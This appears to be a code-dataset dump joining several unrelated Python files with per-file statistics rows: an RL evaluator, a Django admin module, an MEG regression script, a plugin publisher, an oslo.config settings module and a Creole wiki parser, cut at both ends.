batch_size=sim_env_kwargs["batch_size"],
store_rollouts=False,
),
"simulated": lambda: rl_utils.SimulatedBatchGymEnvWithFixedInitialFrames( # pylint: disable=g-long-lambda
**sim_env_kwargs
),
}[env_type]()
def make_agent(
agent_type, env, policy_hparams, policy_dir, sampling_temp,
sim_env_kwargs=None, frame_stack_size=None, planning_horizon=None,
rollout_agent_type=None, batch_size=None, num_rollouts=None,
inner_batch_size=None, video_writer=None, env_type=None):
"""Factory function for Agents."""
if batch_size is None:
batch_size = env.batch_size
return {
"random": lambda: rl_utils.RandomAgent( # pylint: disable=g-long-lambda
batch_size, env.observation_space, env.action_space
),
"policy": lambda: rl_utils.PolicyAgent( # pylint: disable=g-long-lambda
batch_size, env.observation_space, env.action_space,
policy_hparams, policy_dir, sampling_temp
),
"planner": lambda: rl_utils.PlannerAgent( # pylint: disable=g-long-lambda
batch_size, make_agent(
rollout_agent_type, env, policy_hparams, policy_dir,
sampling_temp, batch_size=inner_batch_size
), make_env(env_type, env.env, sim_env_kwargs),
lambda env: rl_utils.BatchStackWrapper(env, frame_stack_size),
num_rollouts, planning_horizon,
discount_factor=policy_hparams.gae_gamma, video_writer=video_writer
),
}[agent_type]()
def make_eval_fn_with_agent(
agent_type, planner_hparams, model_dir, log_every_steps=None,
video_writer=None
):
"""Returns an out-of-graph eval_fn using the Agent API."""
def eval_fn(env, loop_hparams, policy_hparams, policy_dir, sampling_temp):
"""Eval function."""
base_env = env
env = rl_utils.BatchStackWrapper(env, loop_hparams.frame_stack_size)
sim_env_kwargs = rl.make_simulated_env_kwargs(
base_env, loop_hparams, batch_size=planner_hparams.batch_size,
model_dir=model_dir
)
agent = make_agent(
agent_type, env, policy_hparams, policy_dir, sampling_temp,
sim_env_kwargs, loop_hparams.frame_stack_size,
planner_hparams.planning_horizon, planner_hparams.rollout_agent_type,
num_rollouts=planner_hparams.num_rollouts,
inner_batch_size=planner_hparams.batch_size, video_writer=video_writer,
env_type=planner_hparams.env_type
)
rl_utils.run_rollouts(
env, agent, env.reset(), log_every_steps=log_every_steps
)
assert len(base_env.current_epoch_rollouts()) == env.batch_size
return eval_fn
def evaluate(
loop_hparams, planner_hparams, policy_dir, model_dir, eval_metrics_dir,
agent_type, eval_with_learner, log_every_steps, debug_video_path,
report_fn=None, report_metric=None
):
"""Evaluate."""
if eval_with_learner:
assert agent_type == "policy"
if report_fn:
assert report_metric is not None
eval_metrics_writer = tf.summary.FileWriter(eval_metrics_dir)
video_writer = None
kwargs = {}
if not eval_with_learner:
if debug_video_path:
video_writer = common_video.WholeVideoWriter(
fps=10, output_path=debug_video_path, file_format="avi")
kwargs["eval_fn"] = make_eval_fn_with_agent(
agent_type, planner_hparams, model_dir, log_every_steps=log_every_steps,
video_writer=video_writer
)
eval_metrics = rl_utils.evaluate_all_configs(
loop_hparams, policy_dir, **kwargs
)
rl_utils.summarize_metrics(eval_metrics_writer, eval_metrics, 0)
if video_writer is not None:
video_writer.finish_to_disk()
# Report metrics
if report_fn:
if report_metric == "mean_reward":
metric_name = rl_utils.get_metric_name(
sampling_temp=loop_hparams.eval_sampling_temps[0],
max_num_noops=loop_hparams.eval_max_num_noops,
clipped=False
)
report_fn(eval_metrics[metric_name], 0)
else:
report_fn(eval_metrics[report_metric], 0)
return eval_metrics
def get_game_for_worker(map_name, directory_id):
"""Get game for the given worker (directory) id."""
if map_name == "v100unfriendly":
games = ["chopper_command", "boxing", "asterix", "seaquest"]
worker_per_game = 5
elif map_name == "human_nice":
games = gym_env.ATARI_GAMES_WITH_HUMAN_SCORE_NICE
worker_per_game = 5
else:
raise ValueError("Unknown worker to game map name: %s" % map_name)
games.sort()
game_id = (directory_id - 1) // worker_per_game
tf.logging.info("Getting game %d from %s." % (game_id, games))
return games[game_id]
def main(_):
now = datetime.datetime.now()
now_tag = now.strftime("%Y_%m_%d_%H_%M")
loop_hparams = trainer_lib.create_hparams(
FLAGS.loop_hparams_set, FLAGS.loop_hparams
)
if FLAGS.worker_to_game_map and FLAGS.total_num_workers > 1:
loop_hparams.game = get_game_for_worker(
FLAGS.worker_to_game_map, FLAGS.worker_id + 1)
tf.logging.info("Set game to %s." % loop_hparams.game)
if FLAGS.full_eval:
loop_hparams.eval_rl_env_max_episode_steps = -1
planner_hparams = trainer_lib.create_hparams(
FLAGS.planner_hparams_set, FLAGS.planner_hparams
)
policy_dir = FLAGS.policy_dir
model_dir = FLAGS.model_dir
eval_metrics_dir = FLAGS.eval_metrics_dir
if FLAGS.output_dir:
cur_dir = FLAGS.output_dir
if FLAGS.total_num_workers > 1:
cur_dir = os.path.join(cur_dir, "%d" % (FLAGS.worker_id + 1))
policy_dir = os.path.join(cur_dir, "policy")
model_dir = os.path.join(cur_dir, "world_model")
eval_metrics_dir = os.path.join(cur_dir, "evaluator_" + now_tag)
tf.logging.info("Writing metrics to %s." % eval_metrics_dir)
if not tf.gfile.Exists(eval_metrics_dir):
tf.gfile.MkDir(eval_metrics_dir)
evaluate(
loop_hparams, planner_hparams, policy_dir, model_dir,
eval_metrics_dir, FLAGS.agent, FLAGS.eval_with_learner,
FLAGS.log_every_steps if FLAGS.log_every_steps > 0 else None,
debug_video_path=FLAGS.debug_video_path
)
if __name__ == "__main__":
tf.logging.set_verbosity(tf.logging.INFO)
tf.app.run()
| 35.528986
| 112
| 0.730879
| 1,378
| 9,806
| 4.875181
| 0.219884
| 0.032748
| 0.022923
| 0.013397
| 0.244567
| 0.181155
| 0.123846
| 0.101816
| 0.086038
| 0.07919
| 0
| 0.007111
| 0.168264
| 9,806
| 275
| 113
| 35.658182
| 0.816577
| 0.135121
| 0
| 0.131455
| 0
| 0
| 0.134307
| 0.008194
| 0
| 0
| 0
| 0
| 0.014085
| 1
| 0.042254
| false
| 0
| 0.065728
| 0.00939
| 0.140845
| 0.004695
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
135abe65fc98dab6544eb64993951b1e91db47a2
| 732
|
py
|
Python
|
app/grandchallenge/components/admin.py
|
njmhendrix/grand-challenge.org
|
9bc36f5e26561a78bd405e8ea5e4c0f86c95f011
|
[
"Apache-2.0"
] | 1
|
2021-02-09T10:30:44.000Z
|
2021-02-09T10:30:44.000Z
|
app/grandchallenge/components/admin.py
|
njmhendrix/grand-challenge.org
|
9bc36f5e26561a78bd405e8ea5e4c0f86c95f011
|
[
"Apache-2.0"
] | null | null | null |
app/grandchallenge/components/admin.py
|
njmhendrix/grand-challenge.org
|
9bc36f5e26561a78bd405e8ea5e4c0f86c95f011
|
[
"Apache-2.0"
] | null | null | null |
from django.contrib import admin
from grandchallenge.components.models import (
ComponentInterface,
ComponentInterfaceValue,
)
class ComponentInterfaceAdmin(admin.ModelAdmin):
list_display = (
"pk",
"title",
"slug",
"kind",
"default_value",
"relative_path",
)
readonly_fields = (
"default_value",
"relative_path",
)
class ComponentInterfaceValueAdmin(admin.ModelAdmin):
list_display = ("pk", "interface", "value", "file", "image")
readonly_fields = ("interface", "value", "file", "image")
admin.site.register(ComponentInterface, ComponentInterfaceAdmin)
admin.site.register(ComponentInterfaceValue, ComponentInterfaceValueAdmin)
| 23.612903
| 74
| 0.67623
| 59
| 732
| 8.254237
| 0.525424
| 0.11499
| 0.078029
| 0.106776
| 0.11499
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.206284
| 732
| 30
| 75
| 24.4
| 0.83821
| 0
| 0
| 0.173913
| 0
| 0
| 0.157104
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.086957
| 0
| 0.347826
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
135f17354c6a575112f9dd1ee2ae823d8e499637
| 2,299
|
py
|
Python
|
debug/compute_score_common_ts_RETREAT.py
|
DavidSabbagh/meeg_power_regression
|
d9cd5e30028ffc24f08a52966c7641f611e92ee6
|
[
"BSD-3-Clause"
] | 1
|
2020-12-18T06:10:16.000Z
|
2020-12-18T06:10:16.000Z
|
debug/compute_score_common_ts_RETREAT.py
|
DavidSabbagh/meeg_power_regression
|
d9cd5e30028ffc24f08a52966c7641f611e92ee6
|
[
"BSD-3-Clause"
] | null | null | null |
debug/compute_score_common_ts_RETREAT.py
|
DavidSabbagh/meeg_power_regression
|
d9cd5e30028ffc24f08a52966c7641f611e92ee6
|
[
"BSD-3-Clause"
] | 2
|
2021-03-01T01:36:38.000Z
|
2021-03-01T13:44:02.000Z
|
import os.path as op
import numpy as np
import pandas as pd
from sklearn.pipeline import make_pipeline
from sklearn.linear_model import RidgeCV
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import KFold, cross_val_score
import mne
from pyriemann.tangentspace import TangentSpace
import config_drago as cfg
meg = 'mag'
scale = 1e22
rank = 65
reg = 1e-6
seed = 42
n_jobs = 10
cv = KFold(n_splits=n_jobs, shuffle=True, random_state=seed)
def proj_covs_common(covs, picks, scale=scale, rank=rank, reg=reg):
covs = [d['covs'][:, picks][:, :, picks] for d in covs if 'subject' in d]
covs = scale * np.array(covs)
n_sub, n_fb, n_ch, n_ch = covs.shape
# covs2 = covs.reshape(n_sub*n_fb, n_ch, n_ch)
# covs_avg = np.mean(covs2, axis=0)
covs_avg = covs.mean(axis=1).mean(axis=0)
d, V = np.linalg.eigh(covs_avg)
d = d[::-1]
V = V[:, ::-1]
proj_mat = V[:, :rank].T
covs_proj = np.zeros((n_sub, n_fb, rank, rank))
for sub in range(n_sub):
for fb in range(n_fb):
covs_proj[sub, fb] = proj_mat @ covs[sub, fb] @ proj_mat.T
covs_proj[sub, fb] += reg * np.eye(rank)
return covs_proj
def proj_covs_ts(covs):
n_sub, n_fb, p, _ = covs.shape
covs_ts = np.zeros((n_sub, n_fb, (p*(p+1))//2))
for fb in range(n_fb):
covs_ts[:, fb, :] = TangentSpace(metric="wasserstein").fit(
covs[:, fb, :, :]).transform(covs[:, fb, :, :])
return covs_ts
file_covs = op.join(cfg.path_outputs, 'covs_allch_oas.float32.h5')
covs_allch = mne.externals.h5io.read_hdf5(file_covs) # (sub, fb, ch, ch)
info = np.load(op.join(cfg.path_data, 'info_allch.npy')).item()
picks = mne.pick_types(info, meg=meg)
covs = proj_covs_common(covs_allch, picks, scale=scale, rank=rank, reg=reg)
X = proj_covs_ts(covs)
X = X.reshape(len(X), -1)
info = pd.read_csv(op.join(cfg.path_data, 'participants.csv'))
subjects = [d['subject'] for d in covs_allch if 'subject' in d]
y = info.set_index('Observations').age.loc[subjects]
ridge = make_pipeline(StandardScaler(),
RidgeCV(alphas=np.logspace(-3, 5, 100)))
score = - cross_val_score(ridge, X, y, cv=cv,
scoring="neg_mean_absolute_error", n_jobs=n_jobs,
verbose=True)
| 31.930556
| 77
| 0.651588
| 381
| 2,299
| 3.742782
| 0.333333
| 0.014727
| 0.017532
| 0.024544
| 0.146564
| 0.110799
| 0.091164
| 0.023843
| 0.023843
| 0
| 0
| 0.016912
| 0.202697
| 2,299
| 71
| 78
| 32.380282
| 0.761047
| 0.041757
| 0
| 0.037037
| 0
| 0
| 0.058663
| 0.021828
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037037
| false
| 0
| 0.185185
| 0
| 0.259259
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
135f22f80a61bf2986149f078e69c6a03f73a3a5
| 1,161
|
py
|
Python
|
bter/publish.py
|
mengalong/bter
|
7fa56f9c83429bc564e6d123498b14aae5c390b1
|
[
"Apache-2.0"
] | 1
|
2017-08-30T01:01:50.000Z
|
2017-08-30T01:01:50.000Z
|
bter/publish.py
|
mengalong/bter
|
7fa56f9c83429bc564e6d123498b14aae5c390b1
|
[
"Apache-2.0"
] | null | null | null |
bter/publish.py
|
mengalong/bter
|
7fa56f9c83429bc564e6d123498b14aae5c390b1
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017~ mengalong <alongmeng@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import daiquiri
from six.moves.urllib import parse as urlparse
from stevedore import driver
logger = daiquiri.getLogger(__name__)
class PublisherManager(object):
def __init__(self, conf, url):
self.conf = conf
self.url = url
parsed_url = urlparse.urlparse(url)
logger.debug("The parsed url for publisher is :%s" % str(parsed_url))
self.publish_driver = driver.DriverManager(
'bter.publisher',
parsed_url.scheme,
invoke_args=(self.conf,),
invoke_on_load=True).driver
| 33.171429
| 77
| 0.709733
| 160
| 1,161
| 5.05625
| 0.61875
| 0.074166
| 0.032138
| 0.039555
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008724
| 0.210164
| 1,161
| 34
| 78
| 34.147059
| 0.873501
| 0.490956
| 0
| 0
| 0
| 0
| 0.084922
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.066667
| false
| 0
| 0.2
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
135f9d0a7a2f751997f717a3c72579433fa4791e
| 4,269
|
py
|
Python
|
dnsdb/config.py
|
nuby/open_dnsdb
|
7fec703d8458083f0e6826393656055556e9f0b2
|
[
"Apache-2.0"
] | 1
|
2019-09-27T01:06:55.000Z
|
2019-09-27T01:06:55.000Z
|
dnsdb/config.py
|
cclauss/open_dnsdb
|
28c2055685be1c173d77eaa2a05d8e156ccbbbf2
|
[
"Apache-2.0"
] | null | null | null |
dnsdb/config.py
|
cclauss/open_dnsdb
|
28c2055685be1c173d77eaa2a05d8e156ccbbbf2
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import sys
from datetime import timedelta
from oslo.config import cfg
CONF = cfg.CONF
CONF.register_opts([
cfg.StrOpt('log-dir'),
cfg.StrOpt('log-file'),
cfg.StrOpt('debug'),
cfg.StrOpt('verbose'),
], 'log')
CONF.register_opts([
cfg.StrOpt('connection'),
cfg.StrOpt('data'),
], 'DB')
CONF.register_opts([
cfg.StrOpt('server'),
cfg.StrOpt('port'),
cfg.StrOpt('from_addr'),
cfg.StrOpt('info_list'),
cfg.StrOpt('alert_list'),
], 'MAIL')
CONF.register_opts([
cfg.StrOpt('allow_ip'),
cfg.StrOpt('secret_key'),
cfg.StrOpt('env'),
cfg.StrOpt('local_group'),
cfg.StrOpt('acl_dir'),
cfg.StrOpt('view_acl_group')
], 'etc')
CONF.register_opts([
cfg.IntOpt('dnsupdater_port'),
], 'api')
CONF.register_opts([
cfg.StrOpt('acl_groups'),
cfg.IntOpt('cname_ttl'),
cfg.StrOpt('view_zone')
], 'view')
CONF.register_opts([
cfg.StrOpt('base-url',
default='/',
help='The url prefix of this site.'),
cfg.StrOpt('run-mode',
default="werkzeug",
choices=('gunicorn', 'werkzeug'),
help="Run server use the specify mode."),
cfg.StrOpt('bind',
default='0.0.0.0',
help='The IP address to bind'),
cfg.IntOpt('port',
default=8080,
help='The port to listen'),
cfg.BoolOpt('debug',
default=False),
], 'web')
CONF.register_opts([
cfg.StrOpt('config',
default=None,
help='The path to a Gunicorn config file.'),
cfg.StrOpt('bind',
default='127.0.0.1:8888'),
cfg.IntOpt('workers',
default=0,
help='The number of worker processes for handling requests'),
cfg.BoolOpt('daemon',
default=False,
help='Daemonize the Gunicorn process'),
cfg.StrOpt('accesslog',
default=None,
help='The Access log file to write to.'
'"-" means log to stderr.'),
cfg.StrOpt('loglevel',
default='info',
help='The granularity of Error log outputs.',
choices=('debug', 'info', 'warning', 'error', 'critical')),
cfg.BoolOpt('ignore-healthcheck-accesslog',
default=False),
cfg.IntOpt('timeout',
default=30,
help='Workers silent for more than this many seconds are '
'killed and restarted.'),
cfg.StrOpt('worker-class',
default='sync',
help='The type of workers to use.',
choices=('sync', 'eventlet', 'gevent', 'tornado'))
], 'gunicorn')
def setup_config(app_env, app_kind, conf_dir):
if "--" in sys.argv:
args = sys.argv[sys.argv.index("--") + 1:]
else:
args = []
common_config_file = os.path.join(conf_dir, "etc/{}/common.conf".format(app_env))
default_config_files = [common_config_file]
app_config_file = os.path.join(conf_dir, "etc/{}/{}.conf".format(app_env, app_kind))
default_config_files.append(app_config_file)
CONF(default_config_files=default_config_files, args=args)
class Config(object):
def __init__(self, app_env, app_kind, conf_dir):
# print 'conf_dir: ', conf_dir
if "--" in sys.argv:
args = sys.argv[sys.argv.index("--") + 1:]
else:
args = []
common_config_file = os.path.join(conf_dir, "etc/{}/common.conf".format(app_env))
default_config_files = [common_config_file]
app_config_file = os.path.join(conf_dir, "etc/{}/{}.conf".format(app_env, app_kind))
default_config_files.append(app_config_file)
CONF(default_config_files=default_config_files, args=args)
self.SECRET_KEY = os.environ.get('SECRET_KEY') or CONF.etc.secret_key
self.SQLALCHEMY_DATABASE_URI = CONF.DB.connection
self.SQLALCHEMY_TRACK_MODIFICATIONS = False
self.PERMANENT_SESSION_LIFETIME = timedelta(days=1)
# SECRET_KEY = os.environ.get('SECRET_KEY') or CONF.etc.secret_key
# SQLALCHEMY_DATABASE_URI = CONF.DB.connection
# SQLALCHEMY_TRACK_MODIFICATIONS = False
# PERMANENT_SESSION_LIFETIME = timedelta(days=1)
| 31.160584
| 92
| 0.594284
| 524
| 4,269
| 4.662214
| 0.28626
| 0.099468
| 0.052395
| 0.062219
| 0.417519
| 0.345886
| 0.270978
| 0.270978
| 0.270978
| 0.270978
| 0
| 0.008184
| 0.255798
| 4,269
| 136
| 93
| 31.389706
| 0.760781
| 0.057625
| 0
| 0.288288
| 0
| 0
| 0.229084
| 0.006972
| 0
| 0
| 0
| 0
| 0
| 1
| 0.018018
| false
| 0
| 0.036036
| 0
| 0.063063
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
136335a62a6f24cad26390348c87d9d3bbbba896
| 14,534
|
py
|
Python
|
aswiki/parser.py
|
scanner/django-aswiki
|
318908eeccc8da324846ac5ffc4d4a206f560521
|
[
"BSD-3-Clause"
] | null | null | null |
aswiki/parser.py
|
scanner/django-aswiki
|
318908eeccc8da324846ac5ffc4d4a206f560521
|
[
"BSD-3-Clause"
] | 1
|
2020-09-25T05:40:38.000Z
|
2020-09-28T05:41:27.000Z
|
aswiki/parser.py
|
scanner/django-aswiki
|
318908eeccc8da324846ac5ffc4d4a206f560521
|
[
"BSD-3-Clause"
] | null | null | null |
#
# File: $Id: parser.py 1865 2008-10-28 00:47:27Z scanner $
#
"""
This is where the logic and definition of our wiki markup parser lives.
We use the Python Creoleparser (which requires Genshi)
We make a custom dialect so that the parser can know the URL base for
all of the topics (pages) in the wiki and some additional goop so that
we can tell what other topics a given topic refers to.
"""
# system imports
#
from urllib import quote
from urlparse import urlparse
try:
import threading
except ImportError:
import dummy_threading as threading
# Django imports
#
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext as _
# 3rd party imports
#
from creoleparser.dialects import create_dialect, creole10_base, creole11_base
from creoleparser.core import Parser
from genshi import builder
# We see if we have the 'typogrify' app installed. If we do we will
# use it for rendering our templates to prettify them a bit.
#
try:
from typogrify.templatetags.typogrify import typogrify
except ImportError:
def typogrify(text):
return text
# Model imports
#
from aswiki.models import Topic
############################################################################
############################################################################
#
class TopicList(object):
"""
A helper class we use to keep track of all of the topics that are
referenced by the raw content for a specific topic. We pass the
objet and method instead 'path_fn' in to the 'path_func' parameter
of our creole dialect we are goign to generate.
The point of this class is that we need to know what topics are
referenced by a specific topic when its content is created or
modified. This lets us know that list of topics by their topic
names.
"""
########################################################################
#
def __init__(self):
"""
Very plain init. We set up the attribute for tracking topics.
"""
# The current topic that is being rendered, if we know it. This
# lets us root image url's relative to this topic.
#
self.current_topic = None
# The list of topics that we have encountered while rendering
# some content. This should be reset between renders.
#
self.topics = []
# A dict mapping the lower case topic name to the original case used
# in the text being parsed. This is so we can preserve the case
# when doing things like creating nascent topics.
#
self.topics_case = { }
# This is another list. It contains Topic's that we have
# found this topic referring to not via [[wiki links]] but via
# other methods like the <<subtopics >> macro. We need this so
# that when we are done rendering we can find out what other topics
# we should list in this topic's references.
#
self.extra_references = []
# This is a bit of ugliness. Since we instantiate a TopicList and pass
# a method when we create an instance of a Creole _dialect_ this one
# instance will be shared across this process instance which may well
# exist across multiple calls to render text via the parser generated
# from the dialect, which means our list of topics will grow every
# time we render a document.
#
# However, this is a problem since for our current use we only want
# the topic names from rendering a single topic. So we have to make
# sure no other thread of execution (if there are other threads
# running.. if not this is a cheap operation.. XXX I think) modifies
# the topic list we have to provide a mutex so only one thread at a
# time can add topics to a topic list.
#
self.lock = threading.Lock()
return
########################################################################
#
def clear_and_lock(self):
"""
Locks the mutex to prevent conflicts on updating the topic list if
more then one thread tries to render using the same dialect instance
at the same time.
"""
self.lock.acquire()
self.topics = []
self.topics_case = { }
self.extra_references = []
return
########################################################################
#
def unlock(self):
"""
Unlocks the mutex. Do NOT access the topics parameter after this is
called. You can not be guaranteed whose list of topics you are seeing.
"""
self.lock.release()
return
##################################################################
#
def image_fn(self, image_name):
"""
This is called by our creole parser every time it hits an
image link. This lets us translate image names to be relative
to the topic they are found in as appropriate.
We only apply this magic transformation for images url's that
are relative.
Arguments:
- `image_name`: The name of the image being referenced.
"""
# If the image url is NOT absolute, root it relative to this
# topic.
#
u = urlparse(image_name)
if self.current_topic and len(u.path) > 0 and u.path[0] != "/":
return self.current_topic + "/" + image_name
return image_name
########################################################################
#
def path_fn(self, topic_name):
"""
This is called by our creole parser every time it encounters a
wiki link in the text it is parsing. This lets us track which
topics this text refers to.
We are passed in a topic name, and we return that topic
name.. if we were doing some sort of transformation on topic
names this is where it would happen.
Arguments:
- `topic_name`: The topic name being referenced as a wiki link.
"""
lower_topic_name = topic_name.lower()
# if this is a topic name we have not seen yet, add it to our list
# of topics.
#
if lower_topic_name not in self.topics:
self.topics.append(lower_topic_name)
self.topics_case[lower_topic_name] = topic_name
return topic_name
############################################################################
#
def class_fn(topic_name):
"""
This function is invoked by the markup dialect every time it encounters a
wiki topic. It returns a string that is the css class name to add to wiki
links as they are turned in to proper <a href></a> links.
We use this as a way to annotate topics that do not exist yet with some
graphical attribute so that users can easily tell which topics are not yet
created.
We use the wiki.models.TopicManager's css_class_name method to do this
lookup.
NOTE: Since this module is imported by the wiki.models module we need to
import that module inside here so that we can access the Topic
model. This is cheap since it will already be imported.
Arguments:
- `topic_name`: the topic name being checked for existence.
"""
# XXX This is where we should do a cache lookup of the topic name
# and only if that fails fall back to
# Topic.objects.css_class_name(topic_name)
#
return Topic.objects.css_class_name(topic_name)
####################################################################
#
def output_mailto(arg_string):
"""
Given the arguments of an anchor macro output the proper genshi
stream that will render a mailto link. We also need to support the magic
argument string format of '<you> AT <word> AT <foo> DOT <foo>'
Arguments:
- `arg_string`: The argument string of the anchor macro.
- `macro_body`: The macro body if provided
- `block_type`: True if this is a block macro.
"""
# XXX Need to support the fancy format.. but for now just get the basic
# working.
return builder.tag.a(arg_string, href="mailto:%s" % arg_string)
####################################################################
#
def output_subtopics(arg_string):
"""
This will take a single string as its input. It will find all
topics for which the string as a topic name is the parent topic.
There is some semantic magic in a topic if it contains periods, ie: the
'.' character. This forms a kind of hierarchy. Loosely speaking all topics
that start with the same prefix, separated by '.' are sub-topics.
So: 2007.Agenda is a sub-topic of 2007. 2007.Agenda.foo is a subtopic of
2007 and 2007.Agenda.
This macro will insert in to the output <ul> of the topics that are proper
subtopics of the given string, ordered by name. So in the above example if
I were to say <<subtopics 2007>> it would give me "2007.Agenda" and
"2007.Agenda.foo" in a <ul>
If the arg string ends with a dot, then it is treated as the
separator. ie: <<subtopics 2007.>> and <<subtopics 2007>> are identical.
Arguments:
- `arg_string`: The topic we want to find all subtopics of.
"""
arg_string = arg_string
if arg_string[-1] != '.':
arg_string = arg_string + "."
topics = Topic.objects.filter(lc_name__istartswith = arg_string.lower()).order_by('lc_name')
if topics.count() == 0:
return None
ul = builder.tag.ul()
# For every topic that matches our pattern we insert a 'li' link
# to that topic in our output. We also add this topic to the
# 'extra_references' list in our global TOPIC_LIST object. This is
# so that the prerender../save() methods of the Topic object we are
# rendering this output for can know to add those topics to the list
# of topics referenced by the topic being rendered.
for topic in topics:
TOPIC_LIST.extra_references.append(topic)
ul.append(builder.tag.li(builder.tag.a(topic.name,
href = topic.get_absolute_url())))
return ul
####################################################################
#
def output_attachments(arg_string):
"""
Returns a <ul> of all of the attachments attached to the topic name
given as the arg_string.
Arguments:
- `arg_string`: Expected to be the name of a topic. If no such topic
exist, then no attachment list is generated.
"""
try:
topic = Topic.objects.get(lc_name = arg_string.lower())
except Topic.DoesNotExist:
return None
ul = builder.tag.ul()
# For every file attachment on this topic, add a 'li' link
# to that attachment.
#
for attachment in topic.file_attachments.all():
ul.append(builder.tag.li(builder.tag.a(attachment.basename(),
href = attachment.get_absolute_url())))
return ul
####################################################################
#
def macro_fn(name, arg_string, macro_body, block_type, environ):
"""
Handles the macros we define for our version of markup.
Arguments:
- `name`: The name of the macro
- `arg_string`: The argument string, including any delimiters
- `macro_body`: The macro body, None for macro with no body.
- `block_type`: True for block type macros.
- `environ` : The environment object, passed through from
creoleparser.core.Parser class's 'parse()' method.
"""
name = name.strip().lower()
arg_string = arg_string.strip()
if name == 'anchor':
if block_type:
return builder.tag.a(macro_body, name = arg_string)
else:
return builder.tag.a(name = arg_string)
elif name == 'mailto':
return output_mailto(arg_string)
elif name == 'gettext':
if block_type:
return _(macro_body)
else:
return _(arg_string)
elif name == 'subtopics':
return output_subtopics(arg_string)
elif name == 'attachlist':
return output_attachments(arg_string)
elif name == 'attachment':
# For including downloadable attachments in a wiki document.
if block_type:
return builder.tag.a(macro_body, href=arg_string)
else:
return builder.tag.a(arg_string, href=arg_string)
return None
##
## Create our custom dialect. It will use our class function and a TopicList
## instance. The root URL for all wiki topics will be the same as the
## 'aswiki_topic_index' url.
##
## NOTE: This assumes that the url for a specific Topic is the same as the url
## for the aswiki_topic_index with the Topic name appended to it
##
TOPIC_LIST = TopicList()
# dialect = creoleparser.dialects.Creole10(
# wiki_links_base_url = reverse('aswiki_topic_index'),
# wiki_links_space_char = '%20',
# use_additions = True,
# no_wiki_monospace = False,
# wiki_links_class_func = class_fn,
# wiki_links_path_func = TOPIC_LIST.path_fn,
# macro_func = macro_fn,
# interwiki_links_base_urls=dict(wikicreole='http://wikicreole.org/wiki/',
# wikipedia='http://wikipedia.org/wiki/',)
# )
parser = Parser(dialect = create_dialect(\
creole11_base,
wiki_links_base_url = reverse('aswiki_topic_index'), # NOTE: Make this
# a two element
# list for images
# to be loaded
# from a separate
# URL
wiki_links_space_char = '%20', # NOTE: make this a two element list to
# give images a different space
# character.
no_wiki_monospace = False,
wiki_links_class_func = class_fn,
wiki_links_path_func = (TOPIC_LIST.path_fn,
TOPIC_LIST.image_fn),
bodied_macros = { },
non_bodied_macros = { },
macro_func = macro_fn,
# custom_markup = (),
interwiki_links_base_urls = {
'wikicreole' : 'http://wikicreole.org/wiki/',
'wikipedia' :'http://wikipedia.org/wiki/' }
))
| 37.848958
| 96
| 0.597083
| 1,922
| 14,534
| 4.420916
| 0.221124
| 0.031776
| 0.009062
| 0.010004
| 0.154761
| 0.120513
| 0.109803
| 0.075321
| 0.051312
| 0.042603
| 0
| 0.007177
| 0.280996
| 14,534
| 383
| 97
| 37.947781
| 0.805933
| 0.543828
| 0
| 0.238938
| 0
| 0
| 0.031482
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.097345
| false
| 0
| 0.115044
| 0.00885
| 0.424779
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1365f047bda189ac06139ef3c589483027732b74
| 13,825
|
py
|
Python
|
oauth_api/validators.py
|
anobi/django-oauth-api
|
95bf9b500dab326553a5a8a17d5c6da1a34f6ac4
|
[
"BSD-2-Clause"
] | null | null | null |
oauth_api/validators.py
|
anobi/django-oauth-api
|
95bf9b500dab326553a5a8a17d5c6da1a34f6ac4
|
[
"BSD-2-Clause"
] | null | null | null |
oauth_api/validators.py
